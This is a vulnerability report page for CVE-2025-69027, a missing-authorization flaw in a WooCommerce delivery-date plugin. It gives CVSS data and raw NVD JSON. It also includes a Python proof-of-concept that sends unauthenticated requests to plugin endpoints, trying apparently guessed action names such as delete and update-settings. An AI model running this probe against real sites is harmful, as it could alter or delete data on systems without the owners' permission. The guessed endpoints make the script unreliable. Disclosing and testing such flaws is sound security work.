Security Vulnerability Report
中文
CVE-2025-69027 CVSS 5.3 MEDIUM

CVE-2025-69027

Published: 2025-12-30 11:16:01
Last Modified: 2026-04-27 20:16:26

Description

Missing Authorization vulnerability in tychesoftwares Product Delivery Date for WooCommerce – Lite product-delivery-date-for-woocommerce-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Delivery Date for WooCommerce – Lite: from n/a through <= 3.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

product-delivery-date-for-woocommerce-lite <= 3.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69027 PoC - Missing Authorization in Product Delivery Date for WooCommerce Lite # Target: WordPress site with product-delivery-date-for-woocommerce-lite <= 3.2.0 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-69027 """ # Common AJAX endpoints used by the plugin ajax_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wc/v3/delivery-date', '/wp-json/wp/v2/prdd' ] # Vulnerable actions that should require authorization vulnerable_actions = [ 'prdd_delete_delivery_date', 'prdd_save_delivery_date', 'prdd_update_settings', 'tydd_save_date', 'tydd_delete_date' ] print(f'[*] Testing target: {target_url}') print(f'[*] CVE-2025-69027 - Missing Authorization Vulnerability') for endpoint in ajax_endpoints: url = target_url.rstrip('/') + endpoint for action in vulnerable_actions: # Craft request without authentication/authorization headers data = { 'action': action, 'security': '' # Intentionally empty to test if check fails } try: response = requests.post(url, data=data, timeout=10) # Check for successful response without proper auth if response.status_code == 200: # If we get a valid JSON response without auth error, # the vulnerability likely exists if 'success' in response.text or 'data' in response.text: if 'denied' not in response.text.lower() and 'unauthorized' not in response.text.lower(): print(f'[+] VULNERABLE: {action} at {endpoint}') print(f' Response: {response.text[:200]}') return True except requests.exceptions.RequestException as e: print(f'[-] Error testing {url}: {e}') print('[*] Target may not be vulnerable or plugin not installed') return False if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print('Usage: python cve-2025-69027.py http://target.com')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69027", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:01.243", "lastModified": "2026-04-27T20:16:25.677", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in tychesoftwares Product Delivery Date for WooCommerce – Lite product-delivery-date-for-woocommerce-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Delivery Date for WooCommerce – Lite: from n/a through <= 3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/product-delivery-date-for-woocommerce-lite/vulnerability/wordpress-product-delivery-date-for-woocommerce-lite-plugin-3-2-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}